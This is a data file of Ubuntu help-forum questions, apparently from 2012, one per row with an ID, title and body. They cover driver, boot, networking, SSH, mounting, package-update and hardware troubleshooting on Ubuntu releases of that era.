214209	gui for running network statistics or bandwidth limiter ?	is there a networking statistics app or indicator for ubuntu that can measure how much i download/upload every day/week/month and so forth ? i 'm also looking for something similar that can limit my bandwidth usage , kind of like this question , but it would be better if it could limit the bandwidth for certain programs . is this possible ? the best solution would combine both of these two functions . i think i found something a few years ago that could limit my bandwidth ( globally ) after downloading a certain amount of data , but i do n't remember the name . update : the program i used a couple of years ago was ntm . this can show stats for a single interface and disconnect if it reaches a certain data or time limit .
214214	trying connect by ssh and get `` access denied '' by localtunnel	hey i installed localtunnel - http : //progrium.com/localtunnel/ and i tried connect from my laptop using putty ( i even unckecked attempt gssapi authentication ) and i receive login as : hsf hsf @ 4i67.localtunnel.com 's password : access denied hsf @ 4i67.localtunnel.com 's password :
214219	apt-get upgrade : segmentation faulty tree ... 50 %	i am getting $ sudo apt-get upgrade reading package lists ... done segmentation faulty tree ... 50 % how do i fix this ?
214223	can i send a 'waitfor ' signal to windows ?	the waitfor command in windows can be used to either wait for or send arbitrary signals over the network . it 's useful for synchronizing scripts across multiple machines . can i generate one of these signals in ubuntu for a waiting windows machine ?
214225	optimus alienware m14x external hdmi display ?	good evening . i spent few hours browsing possible settings and solutions , but i 'm running out of options so i would really appreciated any help . i got alienware m14x with optimus gt555m card and i would like to run dual screen with my laptop and my external hdmi screen . so far i only found the way how to run one or the other one . is there really no way how to both of them together ? thank you
214229	how do i tell what type of cpu cache is in my laptop ?	is there an application for ubuntu that could tell me details about cpu , cpu cache memory , memory hierarchy , cache architecture implemented in my system , cpu cache size , cpu cache , access cycle and cpu latency ? it could be gui or cli . i prefer an application within ubuntu repos
214235	how to best check my hardware ( mem and hd ) for errors ?	lately , i have been experiencing problems using an apple ( macbook pro 3,1 2gb ram ) with natty installed . in three consecutive occasions/days , the system has started to go extremely slow ; running out of memory ; using the swap a lot ... . , after searching and browsing a lot of images in images.google and facebook , and saving some from time to time . acording to top , xorg was using from 35 to 60 % of memory . but even after closing every single program launched from the gui , the system continued to be extremely slow , and little mem appeared as free ( why can this hapen ? ) . the last day this happened , the root partition was unmounted . i suspected there could be a mem . or hard disk failure . so , after that issue , i ran memtest at boot time ( which , by the way , can not be controlled with the keyboard in this install -- does that happen in all macs ? ) and , after 8 passes , it showed some errors : it displayed `` 8 errors '' , but ( why ? ) the count details , in the red error-lines of output , showed what seemed to be 10 errors : 1 in test 6 , pass # 4 ; and 9 between tests 5 and 6 in pass # 5 . that 's all . after booting again , i was asked if i wanted to fix errors in the disk . i answered 'f ' ( fix - not manual ) and the system booted ok . i think dmesg shows no errors now . the system continues to work fine ( as long as i do n't browse too many photos with firefox or do n't stress it too much ) . i want to know how are the memory chipsets and the hard disk . for that , i want to know : how much can i rely on those memtest results ? is it more or less normal to have errors in memtest with a fine mem chipset ? should i perform further tests ? could a faulty memory give all those symptoms ? . what is a good way to check the hd and what to do afterwards ? i want to know if there are bad blocks marked and check the root partition again . it is type 83 ( according to all ' ? fdisk ' commands ) or ext4 ( according to mount ) . the other partitions in the hd are swap , a fat32 and apple 's filesystem : hfs+
214237	live usb for ubuntu 12.10 does n't boot	i 'm having some trouble installing ubuntu 12.10 on my laptop . i downloaded the iso file from ubuntu and with startup disk creator created startup on mu usb-stick . i changed the boot sequence from hdd to ext usb . but no luck . also created a bootable cd , put it on first boot sequence and also this does n't work . my old os is natty 11.04 . i 'm looking for a solution . remmie
214241	what 's the most efficient way to connect two ubuntu 12.04lts machines hard-drives	i have a macpro desktop and a dell laptop . i want to connect them such that file sharing is as fast as possible . possibly i 'd like to see the hard-drives of each machine mounted making the copying process seamless : copying from macpro to dell : cp /mnt/macpro/home/foo /home/path-to-somewhere copying from dell to macpro : cp /mnt/dell/home/foo /home/path-to-somewhere any suggestion ? in practice i have a lot of data ( therabytes ) and i want to exploit all the cpu-cores i have to process them .
214243	ubuntu 12.10 - nvidia gtx 550 ti proprietary drivers issue	i have installed ubuntu 12.1 and own the nvidia gtx 550 ti ( no integrated video ) . installed it just fine but the buttons and text seem to get scrambled if using the nouveau drivers i guess . i tried installing the proprietary drivers manualy and from the additional drivers tab in software sources but every time i do that after it restarts the menus and icons dissapear an the only way getting them back is to revert to the nouveau drivers . i 've tried noumerous attempts ending up reinstalling it . any help would be apreciated , thanks .
214246	how to fix wrong system time and date ?	i just ran a clean install of 12.10 on my sys76 laptop . time and date reads : 19:36 31 december 1969 , even though it is : 13:29 07 november 2012 . i have it set for my location and it wo n't change manually , even tried in the command line with tz . i think it is messing up the security certificates over the internet cause i can not change ppa over command line and going to launchpad brings up the certificates page in firefox . is this some known bug or is there a fix for it ?
214249	how can i install ubuntu on virtual box with just command prompt	my laptop does not a lot of ram . i have installed virtual box on my windows 7 machine . how can i install a ubuntu environment with just console ? thank you .
214254	how to remove global menu from chromium , firefox ?	sudo apt-get autoremove appmenu-gtk appmenu-gtk3 appmen or sudo apt-get autoremove appmenu-gtk appmenu-gtk3 appmenu-qt . i have used this command to remove the global menu in all installs of unity . it works with all apps except chrome and firefox ( even if you disable appropriate add on in firefox ) . any ideas how to fix this ? i installed unsetting , but that did n't work . help !
214255	environment variable is set but not accessible on server	i have a java program which accesses some property files for it to work through a path which is set as an environment variable . i set the path using export command . the java jar file which is the executable is placed under some different user , and hence i use the sudo option to run the jar file . my problem is , when i set the environment variable on a test server , the program runs fine , however , when i make the same config settings on a production server , and try to run it , it shows that the path set for environment variable is null . i know this has got something to do with the access or perhaps different server configs but as i am new to unix , i am not sure where i can start investigating . can anyone please help ?
214261	problem opening .sh file	i 'm trying to install torchlight from the humble indie bundle 6 . the installation file is an sh file . when i try to run the sh file i get this output . [ user @ pc : ~/desktop $ sudo sh ./torchlight-2012-09-26.sh [ sudo ] password for user : current temporary directory ( usually /tmp by default ) does not seem to be executable ! please specify an alternative path by using the -- target option . ] how do make the tmp dir executable or specify an alternate path ? i 'm running ubuntu 12.10
214263	ubuntu server 12 not spawning a serial ttys0 when running on xen	i have this problem on more than one host , so the specific hardware is not an issue . bare metal ubuntu 12 is not creating a login process on the only serial port , in the default configuration . the serial port works correctly with the firmware . it works correctly with grub2 . i have even connected the serial line to 2 different external client boxes , so the problem is neither the hardware nor the remote client . when finally booted , the system fails to create the login process . root @ xenpro3 : ~ # ps ax | grep tty 1229 tty4 ss+ 0:00 /sbin/getty -8 38400 tty4 1233 tty5 ss+ 0:00 /sbin/getty -8 38400 tty5 1239 tty2 ss+ 0:00 /sbin/getty -8 38400 tty2 1241 tty3 ss+ 0:00 /sbin/getty -8 38400 tty3 1245 tty6 ss+ 0:00 /sbin/getty -8 38400 tty6 1403 tty1 ss+ 0:00 /sbin/getty -8 38400 tty1 1996 pts/0 s+ 0:00 grep -- color=auto tty root @ xenpro3 : ~ # dmesg | grep tty [ 0.000000 ] command line : boot_image=/vmlinuz-3.2.0-30-generic root=/dev/mapper/xenpro3-root ro console=ttys0,115200n8 [ 0.000000 ] kernel command line : boot_image=/vmlinuz-3.2.0-30-generic root=/dev/mapper/xenpro3-root ro console=ttys0,115200n8 [ 0.000000 ] console [ ttys0 ] enabled [ 2.160986 ] serial8250 : ttys0 at i/o 0x3f8 ( irq = 4 ) is a 16550a [ 2.203396 ] serial8250 : ttys1 at i/o 0x2f8 ( irq = 3 ) is a 16550a [ 2.263296 ] 00:08 : ttys0 at i/o 0x3f8 ( irq = 4 ) is a 16550a [ 2.323102 ] 00:09 : ttys1 at i/o 0x2f8 ( irq = 3 ) is a 16550a root @ xenpro3 : ~ # uname -a linux xenpro3 3.2.0-30-generic # 48-ubuntu smp fri aug 24 16:52:48 utc 2012 x86_64 x86_64 x86_64 gnu/linux root @ xenpro3 : ~ # i have tried putting a ttys0.conf file in /etc/initab , which solves the problem bare metal but i still can not get the serial port to work when booting ubuntu on top of xen , as domain 0 . my serial line output looks like this , when booting xen /dev/ttys0 at 0x03f8 ( irq = 4 ) is a 16550a * exporting directories for nfs kernel daemon ... [ ok ] * starting nfs kernel daemon [ ok ] ssl tunnels disabled , see /etc/default/stunnel4 [ 18.654627 ] xenbus : unable to read cpu state [ 18.659631 ] xenbus : unable to read cpu state [ 18.664398 ] xenbus : unable to read cpu state [ 18.669248 ] xenbus : unable to read cpu state * starting xen daemons [ ok ] mountall : disconnected from plymouth at this point , the serial line is no longer connected to a process . xen itself is running just fine . dmesg gives me a long list of [ 120.236841 ] init : ttys0 main process ended , respawning [ 120.239717 ] ttys0 : lsr safety check engaged ! [ 130.240265 ] init : ttys0 main process ( 1631 ) terminated with status 1 [ 130.240294 ] init : ttys0 main process ended , respawning [ 130.242970 ] ttys0 : lsr safety check engaged ! which is no surprise because i see root @ xenpro3 : ~ # ls -l /dev/ttys ? crw-rw -- -- 1 root tty 4 , 64 nov 7 14:04 /dev/ttys0 crw-rw -- -- 1 root dialout 4 , 65 nov 7 14:04 /dev/ttys1 crw-rw -- -- 1 root dialout 4 , 66 nov 7 14:04 /dev/ttys2 crw-rw -- -- 1 root dialout 4 , 67 nov 7 14:04 /dev/ttys3 crw-rw -- -- 1 root dialout 4 , 68 nov 7 14:04 /dev/ttys4 crw-rw -- -- 1 root dialout 4 , 69 nov 7 14:04 /dev/ttys5 crw-rw -- -- 1 root dialout 4 , 70 nov 7 14:04 /dev/ttys6 crw-rw -- -- 1 root dialout 4 , 71 nov 7 14:04 /dev/ttys7 crw-rw -- -- 1 root dialout 4 , 72 nov 7 14:04 /dev/ttys8 crw-rw -- -- 1 root dialout 4 , 73 nov 7 14:04 /dev/ttys9 if i manually change the group of /dev/ttys0 to dialout , it gets changed back . i have made no changes to the default udev rules , so i can not see where this problem is coming from . sincerely , segfaultreloaded
214268	what charms will be best for study for testscalability/performance	i have study project and i must test if `` more computers '' = `` more performance '' using juju and maas . what charms/services you can recommend me ? what will be best solution and easy to check of performance and load . i tried minecraft but i have problems with this charm ( i already post bug ) . i tried with owncloud but i think it was two separate instance of it . thanks of any help !
214271	bad resolution in 12.10 after upgrade from 12.04	i just upgraded from ubuntu 12.04 to 12.10 and the max display resolution is only 1024 x 768 . in 12.04 it was 1680 x 1060 and working fine . i have a samsung syncmaster 225bw display and a graphic card : geforce gtx 550 ti/pcie/sse2 on a intel® core™ i7-2600k cpu @ 3.40ghz × 8 64 bits . how do i get my resolution back .
214274	using ubuntu as a gateway for monitoring and possibly ips ids within active directory	ok , i 've searched for days , maybe you can point me in the right direction . i have an mpls scenario with a shared gateway in a multi-domain m $ ft ad environment . on the inside of the mpls all of the doors are open . i 'd like to put an ubuntu box in between my carrier managed router and my domain within the ad forest . i 'd like the purpose of this box to be for packet inspection , monitoring traffic inbound and outbound , ips/ids alerting ( if possible ) , etc . if there 's something fishy going on , i 'd like to be able to intervene . i 'd also like to keep ad replication , sharing , resource access , emails , etc. , all going smoothly . i 'm not looking to serve dns or dhcp ... i do n't want nat . i basically want this to take packets from one end , spit them out on the other , maintaining state , etc. , i just want some visibility and , if needed , some control . has this been accomplished ? documented ? ideas & /| thoughts ?
214278	i cant install team fortress 2 via steam ?	i followed the tutorial from omgubuntu.co.uk after running steam steam : //open/games in the gnome-terminal i tried to install team fortress 2 ; the link is steam : //run/440 i also opened the link in my web-browser and selected steam to start it up but nothing happens . how to install team fortress 2 via steam ?
214280	any way to keep ubuntu settings when resizing partitions ?	a few days ago i set up ubuntu on my old laptop . i used a live cd with version 12.10 on it . i am new to linux , but everything went fine . however , it would not let me split off a big partition from my hard drive ( with windows vista installed ) to use for ubuntu . this was fine in the beginning , but because i only had a very small partition for ubuntu , it has now started to complain about low memory/unable to save bookmarks , etc . now i would like to resize the ubuntu partition so that it becomes bigger . problem here is that windows programs do n't seem to see the ubuntu partition , and programs ran on ubuntu like gparted are somehow unable to read the windows partition manager table ( or whatever it is called . ) basically they see the whole disk as one big blob , instead of partitions . strange thing is , that in the file system on linux , i can see and use the windows partitions without a problem . the only option that is left that i can see , is to re-install ubuntu completely , getting space from that new partition . my biggest problem with that is however , that i would lose all programs and settings i 've installed so far . so my question : is there a way to back up my settings and programs so i can load them on the newly installed ubuntu ?
214290	uninstalling kde from ubuntu 12.10	ok , as i could not find the solution of my problem here : kde plasma is totally crashed - ubuntu 12.10 i want to uninstall kde desktop environment . now i am in unity . how can i uninstall kde ? note : i will install it again after uninstalling process..
214291	mounting with nautilus works but fstab gives `` host is down '' error ?	i 'm connecting to my university 's vpn so i can connect to the network drive . the vpn seems to be working fine and i can connect to the drive by typing the address into nautilus and entering my login details : smb : //139.___.___.140/home however , this fstab entry does n't work : //139.___.___.140/home /media/___ cifs domain=cs , username==___ , password=___ , uid=sai , gid=sai 0 0 nor does manually mounting it : sudo mount -t cifs //139.___.___.140/home /media/___ -o domain=cs , username=___ , password=___ , uid=sai , gid=sai , user the only error it gives is : mount error ( 112 ) : host is down refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) it 's obvious the host is n't down since i can view the share from nautilus . why is nautilus mounting it fine but not the normal mount command ? what could cause this error ?
214292	maven not working after updating java	i have recently updated my java version to jdk7u9 in my ubuntu 11.04 natty after which my previous maven projects have stopped working . i have installed using this script when i run maven install in my projects ( which previously used to work fine ) i get this error org.apache.maven.lifecycle.lifecycleexecutionexception : error configuring : com.company.build : maven-jsmodule-plugin . reason : a required class was missing during mojo configuration : com/sun/tools/javac/util/pair at org.apache.maven.lifecycle.defaultlifecycleexecutor.executegoals ( defaultlifecycleexecutor.java:723 ) caused by : java.lang.classnotfoundexception : com.sun.tools.javac.util.pair at java.net.urlclassloader $ 1.run ( urlclassloader.java:366 ) at java.net.urlclassloader $ 1.run ( urlclassloader.java:355 ) i have tried googling the issue but all i get is setting the java_home variable which is correct . can anybody please help ? my maven version 2.2.1
214295	how can ubuntu behave more quickly on a usb stick than installed ?	i have a little question about my fresh installation of ubuntu 12.10 on a dell xps 15z ( intel i7 , 8 go ram , nvidia geforce something and an ssd ( 256 go ) . a few months ago , i installed ubuntu 12.04 and it was perfect , without any lag or something . great ! then i uninstalled it . on monday , i tried ubuntu 12.10 with a live usb and it was perfect , fast , unity 3d enabled , no lags ... great ! ( except that i had to boot with the acpi=noirq option , as i read ot on the wiki and as i did before with ubuntu 12.04 . ) then i decided to install it on my computer . no problems , all went perfeclty fine . when grub appeared , i enabled the acpi=noirq and ... blank screen . i know people have already encountered this bug so i wo n't go further . ( with the acpi=off all was fine , but no battery manager . ) i logged in , no problem . and once the desktop open , all become laggy ! it became unusable ! animations very slow , crachs of compiz very often ... my question is : how is this possible ? how ubuntu can be slower once installed than on a usb device ? and how a newer version can be completely slower ( and unusable ) than the previous version ? edit how do i turn off compiz ? killall compiz ?
214301	webcam and cheese : unbelievably slow	i have a machine with 4 gig of ram on a 64 bit computer . yet , cheese is found to be unbelievably slow in recording videos . what would be an apt alternate for video recording on ubuntu systems ? to my surprise , even youtube records videos faster than cheese .
214306	ssh asks for password	i have already : installed the server generated the pub/pri keys with -p `` '' copied the id_rsa.pub to authorized_keys ssh localhost > answered `` yes '' , copied to known_hosts tried ssh localhost > > still asks for password output : hduser @ hduser1-desktop : ~ $ ssh -v localhost openssh_5.3p1 debian-3ubuntu7 , openssl 0.9.8k 25 mar 2009 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : applying options for * debug1 : connecting to localhost [ 127.0.0.1 ] port 22. debug1 : connection established . debug1 : identity file /home/hduser/.ssh/identity type -1 debug1 : identity file /home/hduser/.ssh/id_rsa type 1 debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : identity file /home/hduser/.ssh/id_dsa type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.3p1 debian- 3ubuntu7 debug1 : match : openssh_5.3p1 debian-3ubuntu7 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.3p1 debian-3ubuntu7 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug1 : kex : server- > client aes128-ctr hmac-md5 none debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : ssh2_msg_kex_dh_gex_request ( 1024 < 1024 < 8192 ) sent debug1 : expecting ssh2_msg_kex_dh_gex_group debug1 : ssh2_msg_kex_dh_gex_init sent debug1 : expecting ssh2_msg_kex_dh_gex_reply debug1 : host 'localhost ' is known and matches the rsa host key . debug1 : found key in /home/hduser/.ssh/known_hosts:3 debug1 : ssh_rsa_verify : signature correct debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug1 : ssh2_msg_newkeys received debug1 : ssh2_msg_service_request sent debug1 : ssh2_msg_service_accept received debug1 : authentications that can continue : publickey , password debug1 : next authentication method : publickey debug1 : offering public key : /home/hduser/.ssh/id_rsa debug1 : authentications that can continue : publickey , password debug1 : trying private key : /home/hduser/.ssh/identity debug1 : trying private key : /home/hduser/.ssh/id_dsa debug1 : next authentication method : password any suggestions ? cheers
214310	v11.10 system settings is displaying 41 copies of every app	i just switched from 11.04 to 11.10 on monday ( when support for 11.04 ended ) , and now the system settings app takes forever to come up , and when it does , there are 41 copies of all the apps . 41 `` appearence '' , 41 `` keyboard layout '' , 41 copies of everything . this is highly strange . i 'm not the type to go messing with things i am unfamiliar with , and i am not incompetent with ubuntu . i have no idea how this happened , and i am wondering if anyone else has ever seen such a thing , or can give me a clue as to where to look for a solution . it 's not a `` problem '' as of yet , but it certainly indicates a problem sooner or later .
214311	disable gpuscaling with nividia binary driver 304	in former drivers there was an option in the nvidia-settings gui for that . i also tried it manually : nvidia-settings -- assign=gpuscaling=131074 which gives me : error : the attribute 'gpuscaling ' specified in assignment 'gpuscaling=131074 ' can not be assigned ( it is a read-only attribute ) . i also do not know if 131074 is a correct value . other values give the same error . do i have to revert to an older driver or is there a hack that can prevent my gt8800 from doing gpu scaling .
214312	installing ubuntu with windows installer on windows 8 machine	i have a windows 8 ultrabook . i downloaded ubuntu ( release 12.04 ) and installed using the windows installer ( wubi ) . on rebooting at the end of the installation , i get the windows boot screen asking if i want to boot into windows 8 or ubuntu . i select ubuntu , and i get an error message that says ubuntu is missing a boot file or has errors . please let me know how to fix , or if my procedure is incorrect .
214313	edit places in gnome3	edit : this is a bug , read @ jason 's answer i try to customize the places panel in gnome3 , but both move and remove options are grayed out . also , i want to add folders to places ( not as bookmarks ) , but ca n't seem to find out how . i know there are a lot of questions regarding bookmarks , but i want to be able to edit places ( since bookmarks is n't available through all application 's file dialog )
214315	screen rendering problems after upgrading to 12.10	since upgrading to ubuntu 12.10 i 'm suffering severe rendering issues in unity : some parts of any application ( for instance firefox , or emacs , etc ) are blank , or are not rendered , or are blinking . some fonts in an application are not correct rendered , maybe only some part ( see eclipse screenshot ) . there is some shadows in desktop background . it 's something that occurs from time to time ( it 's works great for hours and suddenly start to give this rendering problems ) . i was trying to find a bug in launchpad but without success . my card ( using i915 module ) : 00:02.0 vga compatible controller [ 0300 ] : intel corporation core processor integrated graphics controller [ 8086:0042 ] ( rev 02 ) i 've tried to reset compiz/unity or gnome but does not help . any tip ? update : a firefox screenshot of how my profile in ask ubuntu looks like now
214321	can an app in `/opt/extras` install themeable icons in `/usr/share` ?	my application variety wallpaper changer runs from /opt/extras and uses an indicator icon . i would like to make this indicator icon theme-specific . as far as i understand the standard way is to install named icons into /usr/share/icons with xdg-icon-resource at installation time . ( am i right about this ? ) . i have two questions regarding this : variety installs and runs from /opt/extras.ubuntu.com . is it acceptable for it to install icons in /usr/share using xdg-icon-resource or is there something else i can do to have theme-specific icons without special-casing themes and dynamically selecting the icon in the code ? variety is packaged using quickly ( and i 'm myself a newbie at packaging ) - how can i configure it to install theme-specific named icons at installation time ?
214327	`` failed to fetch '' while updating	i 'm trying to update from ubuntu 12.10 lately but i keep getting the `` failed to fetch '' error . w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/quantal-security/release unable to find expected entry 'independent/binary-amd64/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal/release unable to find expected entry 'independent/source/sources ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-updates/release unable to find expected entry 'independent/binary-amd64/packages ' in release file ( wrong sources.list entry or malformed file ) w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/quantal-backports/release unable to find expected entry 'independent/binary-amd64/packages ' in release file ( wrong sources.list entry or malformed file ) e : some index files failed to download . they have been ignored , or old ones used instead . i changed the server and deleted the source lists from /var/lib/apt/lists/ like some answers say but still . this is really annoying .
214328	cant boot ubuntu 12.10 from livecd	i had ubuntu installed for a few weeks now until it had a kernel update and i canceled the wifi driver because it did n't work , since then i was n't able to boot into ubuntu . i tried to boot from live-cd but it did n't worked either . i was able to successfully install windows 7 64 bit now and also format my hard drive but i do n't like windows and when i tried to install ubuntu again it did n't work .
214330	using the terminal to open a folder which contains japanese characters	i need to use the terminal to open a folder with a japanese title . if i use - ls to see the name of the folder , all it shows is : `` ■ ■ ■ ■ `` . the actual title is : `` 源氏物語 `` . what should i do ? thanks in advance .
214331	thunderbird suddenly became my default email client	when i had ubuntu 11.10 i had the google email client and was happy with it . now , with 12.04 , i have suddenly found that thunderbird has become default and i do n't like it . why did it suddenly get shoved off on me and how do i get rid of it ? i liked google email client ! thanks for any help , hubert hickey
214334	printing takes forever and gives pixelated prints	i have a brother hl-3070cw printer , which has some serious issues . printing takes an abnormally long time , and if the file has anything more than text in it , it becomes horribly aliased and pixelated . the printer also sometimes complains about running out of memory . this problem has appeared on and off throughout various ubuntu releases , and can sometimes be worked around by saving a file in postscript through evince , and printing the ps file in evince . i tried to install drivers from the brother website , but it gives an error `` dependency not satisfiable : hl3070cwlpr '' help , i 'm wasting a huge amount of paper and ink ( not to mention time ) reprinting pages over and over again in trial and error .
214335	postfix and tmpfs for /var/spool	my main disk is an ssd so in order to preserve its lifetime by reducing writes i followed some advice and made /var/spool a ram disk by adding this line to /etc/fstab : tmpfs /var/spool tmpfs defaults , noatime , mode=1777 0 0 later i configured postfix because i have a raid array on my system and mdadm wants to send me email if the raid array fails which sounds like a fine idea . email sending worked fine until i rebooted , at which point : postfix : fatal : open /etc/postfix-out/main.cf : no such file or directory the fix for this is apparently : mkdir /var/spool/postfix postfix check then i found i also had to do : mkfifo /var/spool/postfix/public/pickup service postfix restart now sending emails works fine ... until the next reboot . so : what is the most correct way to recreate the contents of /var/spool/postfix automatically at boot time if it does not exist ? i am using ubuntu server 12.04 .
214344	how do i re-enable desktop integration with websites ?	the first time facebook came up after clean install of 12.10 i was n't signed in so i declined webapps query to install for that site . ok , now after i have facebook setup how do i get webapps to ask again for facebook ?
214347	insanity joining server 12.04 to windows ad	i 've seen lots of stuff about this error on the internet , but had no luck implementing a solution . i 'm trying to use likewise-open to join an ubuntu server 12.04 machine to a windows active dicrectory domain controller and having absolutely no luck . i run : sudo domainjoin-cli join my.domain.gob administrator and get back ( after putting in the admin password ) : error : dns_error_bad_packet [ code 0x0000251e ] a bad packet was recieved from a dns server . potentially the requested address does not exist . i have heard that wad insists on being your only nameserver , and in attempts to make that work , i 've tried editing /etc/resolv.conf and /etc/network/interfaces but none of that has worked either . ideas ?
214350	asciiquarium , xscreensaver and xubuntu	i downloaded asciiquarium perl script from this site : http : //www.robobunny.com/projects/asciiquarium/html/ i copied it to `` local binary '' and it 's run properly if execute as program . what i wonder , how do i start it as a xscreensaver ? tnx
214355	is there a way to find duplicate images in ubuntu ?	i am wondering if there is a way to compare folders in ubuntu ? i have tried to organize my photo folders many times ... and for this reason i have several folders that contain the same files ( maybe a couple of extra ones ) and it would be great to have a tool to figure out which files are extra and which files are identical . p.s . i have just found an application that works well . it 's called fslint . here is a link to it with a detailed description : http : //www.addictivetips.com/ubuntu-linux-tips/clean-up-ubuntu-remove-duplicates-with-fslint-filesystem-lint/
214356	ubuntu wo n't boot after installing windows 8	ubuntu wont boot up after i installed windows 8 . i get this error : windows failed to start . a recent hardware or software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer . 2 . choose your language settings , and then click `` next . '' 3 . click `` repair your computer . '' if you do n't have this disc , contact your system administrator or computer manufacturer for assistance . file : \ubuntu\winboot\wubildr.mbr status : 0xc000000f
214360	intermittent wireless connection in ubuntu but not in windows	i am new to ubuntu . my wireless connection on ubuntu is not consistent . it connects then disconnects and playing an on and off game . please suggest some solution . is there something that i have change in software because it works pretty good on windows ?
214361	steam not displaying text on wine 1.5 running on ubuntu 12.04	hello fellow dwellers of askubuntu , as the title says i 'm having difficulties with getting steam to run properly . i think i have the solution but i am pretty incompetent with ubuntu ( just started using it the other day ) so a step by step process would be unbelievably appreciated ! here are the links to what i think possible solutions are : [ 1 ] https : //bbs.archlinux.org/viewtopic.php ? id=146223 [ 2 ] http : //bugs.winehq.org/show_bug.cgi ? id=31374 i 've tried googling how to preform the solutions such as changing the alias/script for steam ( no idea what that is ) to -no-dwrite or launching with wine steam.exe -no-dwrite . the dwrite seems to be the issue in all this but i ca n't for the life of me figure out how to do anything about it . any useful input is what i 'm hoping for but for the brave soul who feels like typing a bit more , perhaps a step-by-step list of instructions starting from downloading steam off the official website , would be my saving grace . if there is any more info you guys need let me know and i 'll of course be happy to oblige !
214368	problem booting ubuntu	i have installed ubuntu over a previous windows 7 installation using wubi . once the boot manager asks for which operating system i want i click on linux , but a message comes up that says : ( taken from screenshot from comments ) . windows failed to start . a recent hardware of software change might be the cause . to fix the problem : 1 . insert your windows installation disc and restart your computer 2 . chose your language settings and then click next 3 . click repair your computer . if you do not have this disc , contact your system administrator or computer manufacturer for assistance . file \ubuntu\winboot\wubildr.mbr ( nb : not sure about this line , hard to make out ) starus : 0xc00000093 ( nb , this may be an 8 not a 3 ) info : the selected entry could not be loaded because the application is missing or corrupt .
214374	dell vostro 3560 wireless occurs error while installing	i saw : dropbox driver and had the same issue , that is not solved in that topic : i tried with both ubuntu 11.10 and 12.10 , but got similar dpkg errors : ... /build/src/wl/sys/wl_linux.c:50:24 : fatal error : asm/system.h : n compilation terminated . am i missing anything ? is driver for i386 bad and i must install x64 ubuntu , or what ?
214379	where did /proc/acpi/battery/bat0/xxx go in 12.10 ?	i use some custom scripts that use and monitor the battery information that was in : /proc/acpi/battery/bat0/ ( state|info ) however , since upgrading to 12.10 i no longer have those files and i 've been unable to search for a replacement i can use . anyone know where they went or were replaced with ? where would i go to get current battery state , last charge capacity , original battery capacity , etc ?
214382	is there an intelligent way to look for packages in the repository ?	i would like to know if there is an intelligent program that helps find packages in the repositories . i mean a program that uses intelligent algorithms or that has an advanced search engine where yo can specify the words/phrases you want and/or do n't want to appear in the name , brief description or long description of the package .
214383	can i run ubuntu one in a ubuntu server environment ?	can i run ubuntu one client ( sync up whatever in my 'ubuntu one ' folder ) , in an ubuntu server environment ? if yes , how can i install ubuntu one client in my server environment ?
214391	what language c++ , python , or java is most supported in precise pangolin for game development ?	i 've studied game programming and design in windows using directx , and a bit using python and pygame . i would like to start developing some games for ubuntu . now i would like to build a game called hnefatafl which is mathematically complex but graphically fairly simple ( 2d board game ) . however , i 'll need to create some simpler ones building up to it . anyway , which of the three languages c++ , python , or java is most supported under ubuntu for this type of programming operation ? also , which libraries should i be studying using for such endeavors - opengl , the venerable allegro , or others i 'm not aware of yet ?
214392	ubuntu ati driver on 64bit install	so i am following instructions on this blog post http : //www.techlw.com/2012/08/install-amd-catalyst-128-drivers-in.html which is pretty detailed and works until the install log throws this at me : check if system has the tools required for installation . uninstalling any previously installed drivers . creating symlink /var/lib/dkms/fglrx/8.982/source - > /usr/src/fglrx-8.982 dkms : add completed . kernel preparation unnecessary for this kernel . skipping ... building module : cleaning build area ... . cd /var/lib/dkms/fglrx/8.982/build ; sh make.sh -- nohints -- uname_r=3.5.0-18-generic -- norootcheck ... .. ( bad exit status : 1 ) [ error ] kernel module : failed to build fglrx-8.982 with dkms [ error ] kernel module : removing fglrx-8.982 from dkms -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- deleting module version : 8.982 completely from the dkms tree . -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- done . [ reboot ] kernel module : update-initramfs any thoughts ? essentially gnome 3.6 is broken and because in 12.10 unity does n't fall back , so unity does n't work . when i first installed ubuntu 12.10 it all worked , i saw pretty gnome 3 and pretty unity and then ubuntu was like `` i has updates ! '' and i was like `` take those updates '' then it was like `` ha ! i broke your drivers '' and ya ... ..end of story . so how do i fix this ? i have dual monitors and its mirrored with no other options available . its very important that i fix this and fast . so what should i do ?
214396	file sharing with ext4 partition	i tried googling this problem but i have n't received a definitive answer . this is my situation , i have a 3tb external hard drive connected to my server via esata . i plan on sharing this drive over a network using samba . the hard drive is formatted in ext4 but i need a windows machine to be able to read and write to it over the network to access files , make backups and general storage . i chose ext4 because i heard ntfs-3g has a ton of latency when accessing drives and i like how i can move files while i 'm using them . is this possible or will i have to install some program to at least read the drive ?
214398	how to set up micromax 353g wireless modem in 12.10 ?	i bought a micromax 353g modem which is supported on ubuntu 10.04 but i use 12.10 . can you tell me how to run it in 12.10 ?
